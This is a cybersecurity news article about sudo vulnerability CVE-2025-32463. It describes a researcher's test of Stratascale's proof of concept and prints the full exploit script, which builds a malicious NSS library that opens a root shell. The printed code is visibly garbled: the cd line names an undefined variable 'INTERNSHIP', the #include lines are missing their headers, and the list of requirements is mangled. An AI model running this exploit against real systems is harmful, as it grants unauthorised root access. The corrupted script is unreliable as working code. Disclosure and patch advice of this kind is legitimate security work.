Redazione RHC : 2 July 2025 13:06
Yesterday, Red Hot Cyber published an in-depth analysis of a gserious vulnerability discovered in SUDO (CVE-2025-32463), which allows escalation of privileges to root in Linux environments by exploiting an abuse of the chroot
function.
The exploit, made public by Stratascale, demonstrates how a non-privileged user can obtain root access through a precise chain of operations that exploit incorrect behavior in the management of child processes in environments chroot
.
Manuel Roccon, a researcher from the Red Hot Cyber HackerHood group, wanted to get his hands on the exploit to concretely verify its scope and evaluate its replicability in real environments. “I couldn’t resist the temptation to test it in an isolated environment. It’s impressive how straightforward and clean the mechanism is, once the requirements of the PoC are met,” Manuel says.
The team then tested the Proof of Concept published by Stratascale Exploit CVE-2025-32463 – sudo chroot. The result? Privilege escalation successfully achieved.
The exploit exploits a situation where sudo
executes a command in a chroot
environment, but leaves some possibility for the child process to break out of the chroot and manipulate the process namespace to gain full root access.
The CVE-2025-32463 exploit, demonstrated in the sudo-chwoot.sh
PoC by Rich Mirch (Stratascale CRU), exploits a vulnerability in sudo
that allows an unprivileged user to gain root privileges when sudo
is run with the -R
option (which specifies a chroot directory). The script creates a temporary environment (/tmp/sudowoot.stage.*
), compiles a malicious shared library (libnss_/woot1337.so.2
) containing a constructor function that elevates privileges and opens a root shell (/bin/bash
), and forces sudo
to load it as an NSS library in the chroot
context.
The technique exploits a logic flaw in the handling of the NSS library in chroot
environments, where sudo
dynamically loads external libraries without properly isolating them. The script actually sets up a fake nsswitch.conf
configuration to force the use of its own library, placing it inside the woot/
directory, which acts as a virtual root for the chroot. When sudo -R woot woot
is executed, the woot1337.so.2
library is loaded, and the code is automatically executed thanks to the __attribute__((constructor))
attribute, thus achieving privilege escalation.
The key requirements for successfully exploiting this vulnerability include:
chroot
via sudo
.sudoers
.Below are the simple lines
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${INTERNSHIP?} || exit 1
cat > woot1337.c<<EOF
#include
#include
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
The test performed by Manuel Roccon demonstrates how this vulnerability is not only theoretical, but fully exploitable in production environments that are not properly protected. In DevOps or containerized scenarios, where the use of sudo
and chroot
is common, the risks increase considerably.
Red Hot Cyber and the HackerHood group recommend immediately updating SUDO to the latest available version, and reviewing security configurations related to chroot and sudoers permissions.
Security starts with awareness. Stay tuned for technical analysis, tested PoCs and updated reports.